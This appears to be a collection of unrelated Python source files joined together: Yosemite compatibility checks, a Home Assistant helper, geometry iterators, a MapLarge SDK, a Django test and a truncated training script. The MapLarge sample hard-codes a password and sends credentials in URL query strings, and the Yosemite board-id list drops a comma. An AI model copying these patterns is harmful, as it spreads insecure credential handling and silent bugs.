args = parser.parse_args()
AutoName.directory = args.output_path
dataset = DataSet.from_path(args.dataset_path)
explore_dataset(dataset, args.output_path, n=1)
if __name__ == '__main__':
main()
|
<reponame>bschilder/public-resources
import re
import mygene
def label_txt_formatter(label, max_len = None):
'''
Given a label text, return an abbreviated text
(for figure)
'''
replace_strs = [
('_', ' '),
(r'\(right\)$', '(R)'),
(r'\(left\)$', '(L)'),
(r'percentage', '%'),
(r'90th percentile', '90PCTL'),
(r'number', '#'),
(r'Number', '#'),
(r'Volume of', 'Vol.'),
(r'predicted', 'pred.'),
(r'blood pressure', 'BP'),
(r'Average', 'Ave.'),
(r'average', 'ave.'),
(r', automated reading', ' (AR)'),
(r'cholelithiasis/gall stones', 'Gallstones'),
(r'Body mass index \(BMI\)', 'BMI'),
(r'Creatinine \(enzymatic\) in urine', 'Creatinine in urine'),
(r'Weighted-mean', 'WA'),
(r'treatments/medications', 'medications'),
(r'Peak expiratory flow \(PEF\)', 'PEF'),
(r'Forced expiratory volume in 1-second \(FEV1\)', 'FEV1'),
(r'Forced vital capacity \(FVC\)', 'FVC'),
(r'statistic', 'stat.'),
(r"Alzheimer's disease/dementia", "Alzheimer's/dementia"),
(r'Time spend outdoors in', 'Outdoor time,'),
(r'Time spent outdoors in', 'Outdoor time,'),
(r'Nitrogen dioxide', 'NO2'),
(r'Particulate matter ', ''),
(r'sound level of noise pollution', 'noise lvl.'),
(r'platelet \(thrombocyte\)', 'platelet'),
(r'White blood cell \(leukocyte\)', 'White blood cell'),
(r'Red blood cell \(erythrocyte\)', 'Red blood cell'),
(r'Age at menopause \(last menstrual period\)', 'Age at menopause'),
(r'difficulty/problems', 'problems'),
(r'Nucleated red blood cell', 'Nuc. red blood cell'),
(r'night-time', 'nighttime'),
(r'air pollution', 'air poll.'),
(r';', ''),
(r'heart attack/myocardial infarction', 'heart attack (MI)'),
(r'Childhood sunburn occasions', 'Childhood sunburn'),
(r'deep venous thrombosis \(dvt\)', 'DVT'),
(r'dvt', 'DVT'),
(r'pulmonary embolism', 'PE'),
(r'hereditary/genetic', 'genetic'),
]
formatted = label
for replace in replace_strs:
formatted = re.sub(replace[0], replace[1], formatted)
if(max_len is not None and len(formatted) > max_len):
formatted = '{}..'.format(formatted[:max_len])
return formatted[0].capitalize() + formatted[1:]
def mygene_conv(mg, ens):
ginfo = mg.querymany(
ens,
scopes='ensembl.gene',
fields='symbol',
species='human',
as_dataframe=True,
df_index=False,
).dropna()
if('symbol' in ginfo.keys()):
conv_dict = dict(zip(ginfo['query'], ginfo['symbol']))
else:
conv_dict = dict([])
return [conv_dict[x] for x in ens if x in conv_dict]
def label_txt_formatter_gene(label, gene_dict=None, italic=True):
def to_italic(str):
return r"$\it{" + str + "}$"
if(label.startswith('ENSG')):
if(gene_dict is not None):
label_remap = [
gene_dict[x] for x in label.split(',')
if x in gene_dict
]
else:
label_remap = []
if(len(label_remap) > 0):
if(italic):
return to_italic(','.join(label_remap))
else:
return ','.join(label_remap)
else:
mg = mygene.MyGeneInfo()
label_mygene_map = mygene_conv(mg, label.split(','))
if(len(label_mygene_map) > 0):
if(italic):
return to_italic(','.join(label_mygene_map))
else:
return ','.join(label_mygene_map)
else:
if(italic):
return to_italic(label)
else:
return label
elif(label == 'others'):
return 'Others'
else:
if(italic):
return to_italic(label)
else:
return label
|
<filename>check-10.10-yosemite-compatibility.py
#!/usr/bin/env python
# encoding: utf-8
# ================================================================================
# check-yosemite-compatibility.py
#
# This script checks if the current system is compatible with OS X 10.10 Yosemite.
# These checks are based on the installCheckScript and volCheckScript in
# /Applications/Install OS X Yosemite.app/Contents/SharedSupport/OSInstall.mpkg/Distribution
#
# The checks used in this script are:
# - Machine has a specific supported board-id or is a virtual machine
# - 64 bit capable CPU
# - At least 2 GB of memory
# - Current system version is less than 10.10
# - Current system version is at least 10.6.6 or newer
#
# Exit codes:
# 0 = Yosemite is supported
# 1 = Yosemite is not supported
#
#
# <NAME> <<EMAIL>>
# https://github.com/hjuutilainen/adminscripts
#
# ================================================================================
import sys
import subprocess
import os
import re
import plistlib
from distutils.version import StrictVersion
from Foundation import CFPreferencesCopyAppValue
# ================================================================================
# Start configuration
# ================================================================================
# Set this to False if you don't want any output, just the exit codes
verbose = True
# Set this to True if you want to add "yosemite_supported" custom conditional to
# /Library/Managed Installs/ConditionalItems.plist
update_munki_conditional_items = False
# ================================================================================
# End configuration
# ================================================================================
def logger(message, status, info):
if verbose:
print "%14s: %-40s [%s]" % (message, status, info)
pass
def conditional_items_path():
# <http://code.google.com/p/munki/wiki/ConditionalItems>
# Read the location of the ManagedInstallDir from ManagedInstall.plist
bundle_id = 'ManagedInstalls'
pref_name = 'ManagedInstallDir'
managed_installs_dir = CFPreferencesCopyAppValue(pref_name, bundle_id)
# Make sure we're outputting our information to "ConditionalItems.plist"
if managed_installs_dir:
return os.path.join(managed_installs_dir, 'ConditionalItems.plist')
else:
# Munki default
return "/Library/Managed Installs/ConditionalItems.plist"
def munki_installed():
cmd = ["pkgutil", "--pkg-info", "com.googlecode.munki.core"]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = p.communicate()[0]
if p.returncode == 0:
return True
else:
return False
def is_system_version_supported():
system_version_plist = plistlib.readPlist("/System/Library/CoreServices/SystemVersion.plist")
product_name = system_version_plist['ProductName']
product_version = system_version_plist['ProductVersion']
if StrictVersion(product_version) >= StrictVersion('10.10'):
logger("System",
"%s %s" % (product_name, product_version),
"Failed")
return False
elif StrictVersion(product_version) >= StrictVersion('10.6.6'):
logger("System",
"%s %s" % (product_name, product_version),
"OK")
return True
else:
logger("System",
"%s %s" % (product_name, product_version),
"Failed")
return False
def get_board_id():
cmd = ["/usr/sbin/ioreg",
"-p", "IODeviceTree",
"-r",
"-n", "/",
"-d", "1"]
p1 = subprocess.Popen(cmd, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p2 = subprocess.Popen(["/usr/bin/grep", "board-id"], stdin=p1.stdout, stdout=subprocess.PIPE)
(results, err) = p2.communicate()
board_id = re.sub(r"^\s*\"board-id\" = <\"(.*)\">$", r"\1", results)
board_id = board_id.strip()
if board_id.startswith('Mac'):
return board_id
else:
return None
def is_64bit_capable():
cmd = ["/usr/sbin/sysctl", "-n", "hw.cpu64bit_capable"]
p = subprocess.Popen(cmd, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(results, err) = p.communicate()
if bool(results):
logger("CPU",
"64 bit capable",
"OK")
return True
else:
logger("CPU",
"not 64 bit capable",
"Failed")
return False
def has_required_amount_of_memory():
minimum_memory = int(2048 * 1024 * 1024)
cmd = ["/usr/sbin/sysctl", "-n", "hw.memsize"]
p = subprocess.Popen(cmd, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(results, err) = p.communicate()
actual_memory = int(results)
actual_memory_gigabytes = actual_memory / 1024 / 1024 / 1024
if actual_memory >= minimum_memory:
logger("Memory",
"%i GB physical memory installed" % actual_memory_gigabytes,
"OK")
return True
else:
logger("Memory",
"%i GB installed, 2 GB required" % actual_memory_gigabytes,
"Failed")
return False
def is_virtual_machine():
cmd = ["/usr/sbin/sysctl", "-n", "machdep.cpu.features"]
p = subprocess.Popen(cmd, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(results, err) = p.communicate()
for feature in results.split():
if feature == "VMM":
logger("Board ID",
"Virtual machine",
"OK")
return True
return False
def is_supported_board_id():
if is_virtual_machine():
return True
platform_support_values = [
"Mac-00BE6ED71E35EB86",
"Mac-031AEE4D24BFF0B1",
"Mac-031B6874CF7F642A",
"Mac-189A3D4F975D5FFC",
"Mac-27ADBB7B4CEE8E61",
"Mac-2BD1B31983FE1663",
"Mac-2E6FAB96566FE58C",
"Mac-35C1E88140C3E6CF",
"Mac-35C5E08120C7EEAF",
"Mac-3CBD00234E554E41",
"Mac-42FD25EABCABB274",
"Mac-4B7AC7E43945597E",
"Mac-4BC72D62AD45599E",
"Mac-50619A408DB004DA",
"Mac-66F35F19FE2A0D05",
"Mac-6F01561E16C75D06",
"Mac-742912EFDBEE19B3",
"Mac-77EB7D7DAF985301",
"Mac-7BA5B2794B2CDB12",
"Mac-7DF21CB3ED6977E5",
"Mac-7DF2A3B5E5D671ED",
"Mac-81E3E92DD6088272",
"Mac-8ED6AF5B48C039E1",
"Mac-942452F5819B1C1B",
"Mac-942459F5819B171B",
"Mac-94245A3940C91C80",
"Mac-94245B3640C91C81",
"Mac-942B59F58194171B",
"Mac-942B5BF58194151B",
"Mac-942C5DF58193131B",
"Mac-AFD8A9D944EA4843",
"Mac-C08A6BB70A942AC2",
"Mac-C3EC7CD22292981F",
"Mac-F2208EC8",
"Mac-F2218EA9",
"Mac-F2218EC8"
"Mac-F2218FA9",
"Mac-F2218FC8",
"Mac-F221BEC8",
"Mac-F221DCC8",
"Mac-F222BEC8",
"Mac-F2238AC8",
"Mac-F2238BAE",
"Mac-F223BEC8",
"Mac-F22586C8",
"Mac-F22587A1",
"Mac-F22587C8",
"Mac-F22589C8",
"Mac-F2268AC8",
"Mac-F2268CC8",
"Mac-F2268DAE",
"Mac-F2268DC8",
"Mac-F2268EC8",
"Mac-F226BEC8",
"Mac-F22788AA",
"Mac-F227BEC8",
"Mac-F22C86C8",
"Mac-F22C89C8",
"Mac-F22C8AC8",
"Mac-F42386C8",
"Mac-F42388C8",
"Mac-F4238BC8",
"Mac-F4238CC8",
"Mac-F42C86C8",
"Mac-F42C88C8",
"Mac-F42C89C8",
"Mac-F42D86A9",
"Mac-F42D86C8",
"Mac-F42D88C8",
"Mac-F42D89A9",
"Mac-F42D89C8",
"Mac-F60DEB81FF30ACF6",
"Mac-F65AE981FFA204ED",
"Mac-FA842E06C61E91C5",
"Mac-FC02E91DDD3FA6A4"]
board_id = get_board_id()
if board_id in platform_support_values:
logger("Board ID",
board_id,
"OK")
return True
else:
logger("Board ID",
"\"%s\" is not supported" % board_id,
"Failed")
return False
def append_conditional_items(dictionary):
current_conditional_items_path = conditional_items_path()
if os.path.exists(current_conditional_items_path):
existing_dict = plistlib.readPlist(current_conditional_items_path)
output_dict = dict(existing_dict.items() + dictionary.items())
else:
output_dict = dictionary
plistlib.writePlist(output_dict, current_conditional_items_path)
pass
def main(argv=None):
yosemite_supported_dict = {}
yosemite_needs_fw_update_dict = {}
# Run the checks
board_id_passed = is_supported_board_id()
memory_passed = has_required_amount_of_memory()
cpu_passed = is_64bit_capable()
system_version_passed = is_system_version_supported()
if board_id_passed and memory_passed and cpu_passed and system_version_passed:
yosemite_supported = 0
yosemite_supported_dict = {'yosemite_supported': True}
else:
yosemite_supported = 1
yosemite_supported_dict = {'yosemite_supported': False}
# Update "ConditionalItems.plist" if munki is installed
if munki_installed() and update_munki_conditional_items:
append_conditional_items(yosemite_supported_dict)
# Exit codes:
# 0 = Yosemite is supported
# 1 = Yosemite is not supported
return yosemite_supported
if __name__ == '__main__':
sys.exit(main())
|
<gh_stars>1-10
import asyncio
import inspect
import json
import logging
import os
from typing import Dict, Final, Mapping, Optional, TYPE_CHECKING, Tuple, Type
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_USERNAME
from homeassistant.core import callback
from homeassistant.helpers.typing import HomeAssistantType
from .api import API, MoscowPGUException, Profile, ResponseError
from .const import DATA_SESSION_LOCK, DOMAIN, SUPPORTED_PLATFORMS
if TYPE_CHECKING:
from ._base import MoscowPGUEntity
_LOGGER: Final = logging.getLogger(__name__)
@callback
def async_get_lock(hass: HomeAssistantType):
session_lock = hass.data.get(DATA_SESSION_LOCK)
if session_lock is None:
session_lock = asyncio.Lock()
hass.data[DATA_SESSION_LOCK] = session_lock
return session_lock
def read_sessions_file(hass: HomeAssistantType) -> Tuple[Dict[str, str], str]:
filename = hass.config.path(os.path.join(".storage", DOMAIN + ".sessions"))
contents = {}
if os.path.isfile(filename):
with open(filename, "rt") as f:
try:
contents = json.load(f)
except json.JSONDecodeError:
pass
return contents, filename
async def async_load_session(hass: HomeAssistantType, username: str) -> Optional[str]:
def load_session_from_json() -> Optional[str]:
contents, _ = read_sessions_file(hass)
return contents.get(username)
async with async_get_lock(hass):
return load_session_from_json()
async def async_save_session(hass: HomeAssistantType, username: str, session_id: str) -> None:
def save_session_to_json() -> None:
contents, filename = read_sessions_file(hass)
contents[username] = session_id
with open(filename, "w") as f:
json.dump(contents, f)
async with async_get_lock(hass):
save_session_to_json()
async def async_authenticate_api_object(
hass: HomeAssistantType,
api: API,
skip_session: bool = False,
) -> "Profile":
username = api.username
if api.session_id is None or skip_session:
_LOGGER.debug('Authenticating with user "%s"', username)
try:
await api.authenticate()
except ResponseError as exc:
if exc.error_code == 502:
raise
_LOGGER.debug('Authentication successful for user "%s"', username)
await async_save_session(hass, username, api.session_id)
_LOGGER.debug('Saved session for user "%s"', username)
else:
_LOGGER.debug('Loaded session for user "%s"', username)
try:
return await api.get_profile()
except MoscowPGUException as e:
if (isinstance(e, ResponseError) and e.error_code == 502) or skip_session:
raise
return await async_authenticate_api_object(hass, api, True)
def generate_guid():
from uuid import uuid4
return uuid4().hex
@callback
def find_existing_entry(hass: HomeAssistantType, username: str) -> Optional[ConfigEntry]:
existing_entries = hass.config_entries.async_entries(DOMAIN)
for config_entry in existing_entries:
if config_entry.data[CONF_USERNAME] == username:
return config_entry
def load_platforms_base_classes() -> Mapping[str, Type["MoscowPGUEntity"]]:
return {
platform: __import__(
f"custom_components.{DOMAIN}." + platform, globals(), locals(), ("BASE_CLASS",)
).BASE_CLASS
for platform in SUPPORTED_PLATFORMS
}
def all_subclasses(cls, include_abstract: bool = False):
base_subclasses = cls.__subclasses__()
if not include_abstract:
base_subclasses = {c for c in base_subclasses if not inspect.isabstract(c)}
return set(base_subclasses).union(
[s for c in cls.__subclasses__() for s in all_subclasses(c, include_abstract)]
)
|
# coding: utf-8
r"""iteration.py module
Summary
-------
This module helps looping through topology
"""
import OCC.BRep
import aocutils.topology
import aocutils.brep.edge
class EdgePairsFromWire(object):
r"""Helper class to loop through a wire and return ordered pairs of edges
Parameters
----------
wire : OCC.TopoDS.TopoDS_Wire
"""
def __init__(self, wire):
self.wire = wire
self.edge_pairs = list()
self.prev_edge = None
self.wire_explorer = aocutils.topology.WireExplorer(self.wire).ordered_edges()
self.number_of_edges = self.wire_explorer.__length_hint__()
self.previous_edge = None
self.current_edge = None
self.first_edge = None
self.index = 0
def next(self):
r"""next() method to make EdgePairsFromWire an iterable
Returns
-------
"""
if self.index == 0:
# first edge, need to set self.previous_edge
self.previous_edge = self.wire_explorer.next()
self.current_edge = self.wire_explorer.next()
self.first_edge = self.previous_edge # for the last iteration
self.index += 1
return [self.previous_edge, self.current_edge]
elif self.index == self.number_of_edges-1:
# no next edge
self.index += 1
return [self.current_edge, self.first_edge]
else:
self.previous_edge = self.current_edge
self.current_edge = self.wire_explorer.next()
self.index += 1
return [self.previous_edge, self.current_edge]
def __iter__(self):
return self
class LoopWirePairs(object):
r"""For looping through consecutive wires assures that the returned edge pairs are ordered
Parameters
----------
wire_a : OCC.TopoDS.TopoDS_Wire
wire_b : OCC.TopoDS.TopoDS_Wire
"""
def __init__(self, wire_a, wire_b):
self.wireA = wire_a
self.wireB = wire_b
self.wire_explorer_a = aocutils.topology.WireExplorer(self.wireA)
self.wire_explorer_b = aocutils.topology.WireExplorer(self.wireB)
self.topo_a = aocutils.topology.Topo(self.wireA)
self.topo_b = aocutils.topology.Topo(self.wireB)
self.brep_tool = OCC.BRep.BRep_Tool()
self.vertices_a = [v for v in self.wire_explorer_a.ordered_vertices()]
self.vertices_b = [v for v in self.wire_explorer_b.ordered_vertices()]
self.edges_a = [v for v in aocutils.topology.WireExplorer(wire_a).ordered_edges()]
self.edges_b = [v for v in aocutils.topology.WireExplorer(wire_b).ordered_edges()]
self.pnts_b = [self.brep_tool.Pnt(v) for v in self.vertices_b]
self.number_of_vertices = len(self.vertices_a)
self.index = 0
def closest_point(self, vertex_from_wire_a):
r"""Closest vertex in the wire b to a vertex from wire a
Parameters
----------
vertex_from_wire_a
Returns
-------
OCC.TopoDS.TopoDS_Vertex
"""
pt = self.brep_tool.Pnt(vertex_from_wire_a)
distances = [pt.Distance(i) for i in self.pnts_b]
indx_max_dist = distances.index(min(distances))
return self.vertices_b[indx_max_dist]
def next(self):
r"""next() method to make LoopWirePairs an iterable
Returns
-------
"""
if self.index == self.number_of_vertices:
raise StopIteration
vert = self.vertices_a[self.index]
closest = self.closest_point(vert)
edges_a = self.topo_a.edges_from_vertex(vert)
edges_b = self.topo_b.edges_from_vertex(closest)
edge_a1, edge_a2 = aocutils.brep.edge.Edge(edges_a.next()), aocutils.brep.edge.Edge(edges_a.next())
edge_b1, edge_b2 = aocutils.brep.edge.Edge(edges_b.next()), aocutils.brep.edge.Edge(edges_b.next())
mp_a = edge_a1.mid_point()[1]
self.index += 1
if mp_a.Distance(edge_b1.mid_point()[1]) < mp_a.Distance(edge_b2.mid_point()[1]):
return iter([edge_a1, edge_a2]), iter([edge_b1, edge_b2])
else:
return iter([edge_a1, edge_a2]), iter([edge_b2, edge_b1])
def __iter__(self):
return self
|
#!/usr/bin/python3
# number of output figures = 4
import random
import numpy as np
import helper.basis
from helper.figure import Figure
import helper.grid
import helper.plot
def getChain(l1, i1, l2, i2, T):
chain = [(np.array(l1), np.array(i1))]
for t in T:
lNext, iNext = chain[-1]
lNext, iNext = np.array(lNext), np.array(iNext)
lNext[t], iNext[t] = l2[t], i2[t]
chain.append((lNext, iNext))
if np.all(chain[-1][0] == l2) and np.all(chain[-1][1] == i2):
return chain
else:
return None
def main():
n, d, b = 3, 2, 1
numberOfRefinements = 20
seed = 1
T = [0, 1]
X, L, I = helper.grid.RegularSparseBoundary(n, d, b).generate()
N = L.shape[0]
grid = helper.grid.SpatiallyAdaptiveSparse(L, I)
refinementCounter = 0
random.seed(seed)
while refinementCounter < numberOfRefinements:
k = random.randrange(N)
grid.refine(k)
newN = grid.L.shape[0]
if newN > N:
N = newN
refinementCounter += 1
for q in range(4):
fig = Figure.create(figsize=(2, 2), scale=0.85)
ax = fig.gca()
X, L, I = grid.getGrid()
N = X.shape[0]
ax.plot([0, 1, 1, 0, 0], [0, 0, 1, 1, 0], "k-")
ax.plot(X[:,0], X[:,1], "k.", clip_on=False)
if q >= 1:
if q == 1: basis1D = helper.basis.HierarchicalBSpline(1)
elif q == 2: basis1D = helper.basis.HierarchicalBSpline(3)
elif q == 3: basis1D = helper.basis.HierarchicalWeaklyFundamentalSpline(3)
basis = helper.basis.TensorProduct(basis1D, d)
oldN = 0
LI = np.hstack((L, I))
while oldN < N:
print(N)
oldN = N
oldX, oldL, oldI = X, L, I
for k1 in range(N):
for k2 in range(N):
chain = getChain(L[k1], I[k1], L[k2], I[k2], T)
x2 = np.array([X[k2]])
for l, i in chain[1:-1]:
li = np.hstack((l, i))
if abs(basis.evaluate(L[k1], I[k1], x2)) > 1e-10:
if not np.any(np.all(li == LI, axis=1)):
LI = np.vstack((LI, li))
L, I = LI[:,:d], LI[:,d:]
X = helper.grid.getCoordinates(L, I)
N = L.shape[0]
if N > oldN:
K = np.any(np.all(np.hstack((oldL, oldI)) ==
np.hstack((L, I))[:,np.newaxis], axis=2), axis=1)
notK = np.logical_not(K)
ax.plot(X[notK,0], X[notK,1], ".", clip_on=False)
#if q in [0, 3]:
# helper.plot.plotArrow(ax, [0.27, 0.81], [0.39, 0.81], scaleHead=0.5)
# helper.plot.plotArrow(ax, [0.29, 0.79], [0.29, 0.91], scaleHead=0.5)
# ax.text(0.41, 0.81, r"$x_1$", ha="left", va="center")
# ax.text(0.29, 0.92, r"$x_2$", ha="center", va="bottom")
ax.set_axis_off()
fig.save()
if __name__ == "__main__":
main()
|
import urllib2
import urllib
import urlparse
import json
import mimetypes
import mimetools
class MapLargeConnector(object):
###
# Creates a connection to a MapLarge API server
###
###
# When NO_WEB_CALLS is true all MapLargeConnectors will not make remote
# calls. Instead, the response will be the full URL that would have been
# invoked.
###
NO_WEB_CALLS = False
__user = None
__token = None
__apiserver = None
__authstring = ""
__password = None
__defaultHeaders = [('User-agent', 'MapLarge SDK Python')]
def __init__(self, server, user, passwordOrToken=None):
"""
Constructor. Creates a connection to a MapLarge API server with a
username and token as credentials.
@param server: URL of API server. Must begin with valid protocol
@param user: Username to use for connection credentials.
@param passwordOrToken: Authentication token/password to use for connection credentials.
@raise ValueError:
"""
try:
self.__apiserver = server
self.__user = user
if isinstance(passwordOrToken, int):
self.__token = str(passwordOrToken)
elif isinstance(passwordOrToken, str):
self.__token = self.__GetToken(passwordOrToken)
else:
raise ValueError, "No Password or Token"
self.__authstring = "mluser=" + self.__user + "&mltoken=" + self.__token;
except Exception as e:
raise e
def __GetToken(self, password):
try:
querystring = urllib.urlencode({"mluser": self.__user, "mlpass": password}) + "&" + self.__authstring
if self.NO_WEB_CALLS:
retVal = querystring
else:
response = self.__InvokeURL("Auth", "Login", querystring)
respObj = json.loads(response)
success = respObj['success']
if success == True:
retVal = respObj['token']
else:
retVal = "ERROR"
except Exception as e:
print e
retVal = "ERROR"
return retVal
def __InvokeURL(self, controller, actionname, params):
try:
urlstring = urlparse.urljoin(self.__apiserver, controller + "/" + actionname)
urlstring = urlstring + '?' + params
if self.NO_WEB_CALLS:
retVal = urlstring
else:
flob = urllib2.urlopen(urllib2.Request(urlstring))
retVal = flob.read()
except Exception as e:
print e
retVal = "ERROR"
return retVal
def __InvokePostURL(self, controller, actionname, params, filepaths):
try:
urlstring = urlparse.urljoin(self.__apiserver, controller + "/" + actionname)
if self.NO_WEB_CALLS:
retVal = urlstring
else:
part_boundary = '--' + mimetools.choose_boundary()
CRLF = '\r\n'
L = []
for (key, val) in params.items():
L.append('--' + part_boundary)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(val)
files = []
for fileName in filepaths:
fileBody = open(fileName, "rb").read()
L.append('--' + part_boundary)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('fileUpload', fileName))
fileContentType = mimetypes.guess_type(fileName)[0] or 'application/octet-stream'
L.append('Content-Type: %s' % fileContentType)
L.append('')
L.append(fileBody)
L.append('--' + part_boundary + '--')
L.append('')
#files = {'file': {'filename': 'F.DAT', 'content': 'DATA HERE'}}
postData = body = CRLF.join(L)
request = urllib2.Request(urlstring)
for name, value in self.__defaultHeaders:
request.add_header(name, value)
# conn.ContentType = "multipart/form-data; boundary=" + boundary;
request.add_header('Content-type', 'multipart/form-data; boundary=%s' % part_boundary)
request.add_header('Content-length', len(postData))
request.add_data(postData)
resp = urllib2.urlopen(request)
retVal = resp.read()
except Exception as e:
print e
retVal = "ERROR"
return retVal
def InvokeAPIRequestPost(self, action, params, filepaths=None):
"""
@param action: Name of API action being called.
@param params: dict of key value pairs.
@param filepaths: List of filename(s) to upload. Do not pass of not required.
@return : API response, usually a JSON formatted string. Returns "ERROR" on exception.
"""
try:
params["mluser"] = self.__user;
params["mltoken"] = self.__token;
if (filepaths == None):
retval = self.__InvokePostURL("Remote", action, params, [])
else:
retval = self.__InvokePostURL("Remote", action, params, filepaths)
except Exception as e:
print e
retval = "ERROR"
return retval
def InvokeAPIRequest(self, action, params, filepaths=None):
"""
@param action: Name of API action being called.
@param params: dict of key value pairs.
@return : API response, usually a JSON formatted string. Returns "ERROR" on exception.
"""
try:
querystring = urllib.urlencode(params) + "&" + self.__authstring
retVal = self.__InvokeURL("Remote", action, querystring)
except Exception as e:
print e
retVal = "ERROR"
return retVal
def GetRemoteAuthToken(self, user, password, ipaddress):
"""
@param user: Username to create authentication token for
@param password: Password for supplied username
@param ipaddress: IP address of the user for whom you want to build an authentication token
@return: The authentication token in String form.
"""
try:
retVal = self.__InvokeURL("Auth", "RemoteLogin",
"mluser=" + user + "&mlpass=" + password + "&remoteIP=" + ipaddress);
except Exception as e:
print e
retVal = "ERROR"
return retVal
##DEFAULT CREDENTIALS
server = "http://server.maplarge.com/"
user = "<EMAIL>"
pw = "pw123456"
token = <PASSWORD>
#CREATE MAPLARGE CONNECTION WITH USER / PASSWORD
mlconnPassword = MapLargeConnector(server, user, pw)
#CREATE MAPLARGE CONNECTION WITH USER / AUTH TOKEN
mlconnToken = MapLargeConnector(server, user, token)
#CREATE TABLE SYNCHRONOUS (NO WEB CALL)
params = {"account": "aidsvualpha", "tablename": "testPythonSdkTable", "fileurl": "http://localhost/testfile.csv"}
mlconnToken.NO_WEB_CALLS = True
response = mlconnToken.InvokeAPIRequest("CreateTableSynchronous", params)
print response
mlconnPassword.NO_WEB_CALLS = False
#RETRIEVE REMOTE USER AUTH TOKEN
response = mlconnPassword.GetRemoteAuthToken(user, pw, "255.255.255.255")
print response
#List Groups
params = {"account": "aidsvualpha"}
response = mlconnPassword.InvokeAPIRequestPost("ListGroups", params)
print response
#CREATE TABLE WITH FILES SYNCHRONOUS
params = {"account": "aidsvualpha", "tablename": "testTable"}
fileList = ["c:\\temp\\usa.csv"]
print mlconnPassword.InvokeAPIRequestPost("CreateTableWithFilesSynchronous", params, fileList)
|
<reponame>iqDF/Django-Custom-User<gh_stars>1-10
from django.urls import reverse
from django.contrib.auth import get_user_model
from django.test.client import Client
from rest_framework import status
from rest_framework.test import APITestCase
from utils.random_support import RandomSupport
from duty_api.serializers import DutySerializer
from duty_api.models import Duty, DutyManager
User = get_user_model()
class DutyAPITests(APITestCase, RandomSupport):
"""Test endpoints in `duties/api/` API.
"""
client = Client()
def create_user(self, name=None, email=None, password=None):
"""Helper that create mock user that is:
- is_active (bool) True
- is_staff (bool) & is_superuser (bool) are False
- credential using email & password field
Args:
name (str): name for user, generate random name if None
email (str): email for credential, generate random <EMAIL> email if None
password (str): password for credential, generate random password if None
Returns:
user (User)
"""
# random generate value if not specified
name = name if name else self.generate_name()
email = email if email else self.generate_email()
password = password if password else self.<PASSWORD>()
# create user with specified model fields
user = User.objects.create_user(
name=name, email=email, password=password
)
user.save()
return user
def setUp(self):
# setup duty manager
self.duty_manager = DutyManager()
# setup mock user
self.email = self.generate_email()
self.password = <PASSWORD>(10)
self.user = self.create_user(email=self.email, password=self.password)
def test_request_get_started_duty(self):
"""Test GET duty is valid only if active duty is associated with
the authenticated user.
"""
# initially no duty associated, hence DoesNotExist is raised
with self.assertRaises(Duty.DoesNotExist):
duty = self.user.duty
# authenticate & login user
is_logged_in = self.client.login(email=self.email, password=self.password)
self.assertTrue(is_logged_in)
# GET expect Http400 or 404 since no duty ever associated with user before.
response = self.client.get(reverse('duty-api'))
self.assertIn(response.status_code,
[status.HTTP_400_BAD_REQUEST, status.HTTP_404_NOT_FOUND]
)
# start/create duty associated with user internally
self.duty_manager.start_duty(self.user)
# verify duty is created in duty manager and associated to user
self.assertIsNotNone(self.duty_manager.duty)
self.assertIs(self.duty_manager.duty, self.user.duty)
# GET expect Http200 success since duty is associated with authenticated user
serialized = DutySerializer(self.user.duty)
response = self.client.get(reverse('duty-api'))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data.get('payload'), serialized.data)
def test_request_post_create_duty(self):
"""Test POST duty is valid if user has not associated with any duty and
no duty is active in duty manager.
"""
# initially no duty associated, hence DoesNotExist is raised
with self.assertRaises(Duty.DoesNotExist):
duty = self.user.duty
# initially no duty is active in duty manager
self.assertIsNone(self.duty_manager.duty)
# authenticate & login user
is_logged_in = self.client.login(email=self.email, password=self.password)
self.assertTrue(is_logged_in)
# POST expect Http200 success since creation is valid
response = self.client.post(reverse('duty-api'))
self.user.refresh_from_db() # refresh to get one-one duty
serialized = DutySerializer(self.user.duty)
self.assertIn(response.status_code, [status.HTTP_200_OK, status.HTTP_201_CREATED])
self.assertEqual(response.data.get('payload'), serialized.data)
def test_request_delete_duty(self):
"""Test DELETE duty is valid only if duty has been finished.
"""
pass
def tearDown(self):
# reset duty manager from any duty associated
duty_manager = DutyManager()
duty_manager.reset()
|
<reponame>Huda-Hakami/Context-Guided-Relation-Embeddings
import numpy as np
from wordreps import WordReps
from algebra import cosine, normalize
import tensorflow as tf
import random
from dataset import DataSet
import NLRA_Model
from Eval import eval_SemEval
import sklearn.preprocessing
# ============ End Imports ============
class Training():
def __init__(self):
# Hyperparameters for compositional-based word pari embeddings (G1)
self.batchSize=100
G1_HL=3
G1_Hdim=WR.dim
G1_BN=True #boolean variable T/F for batch normalization on G1 MLP
G1_l2_reg=0.0 # L2 regularization coefficient
self.G1_pkeep=1.0 # 1.0 means no Dropout applied during training on G1
# Hyperparameters for LSTM encoder for patterns (G2)
G2_HL=1
G2_Hdim=WR.dim
self.G2_pkeep=1.0 # 1.0 means no Dropout applied during training on G2
activ='tanh'
# Create relational model instance
self.RelModel=NLRA_Model.NLRA(activ,self.batchSize)
self.RelModel.G1_model(Ea,G1_BN,G1_HL,G1_Hdim,G1_l2_reg)
self.RelModel.G2_rnn_model(DS.max_length,G2_HL,G2_Hdim)
self.RelModel.define_NLRA_loss()
self.RelModel.optimize()
self.sess=tf.Session()
# --------------------------------------------------
def Train_NLRA_Model(self):
# Hyperparameters
self.sess.run(tf.global_variables_initializer())
n=10 #number of negative patterns for each word-pairs
epochs=500
winn_loss=1e7
win_acc=-1
Train = DS.Training_triplesIDs
print ("Number of training triples (a,b,p)",len(Train))
print ("==========================================================================")
for epoch in range(epochs):
# Randomly shuffle training instances for each epoch
random.shuffle(Train)
# performance every 20 steps
if epoch%1==0:
Pair_Embeddings=self.Gen_Pair_Embeddings()
acc_1,corr_1=eval_SemEval(Pair_Embeddings,'Test')
acc_2,corr_2=eval_SemEval(Pair_Embeddings,'Valid')
acc_3,corr_3=eval_SemEval(Pair_Embeddings,'All')
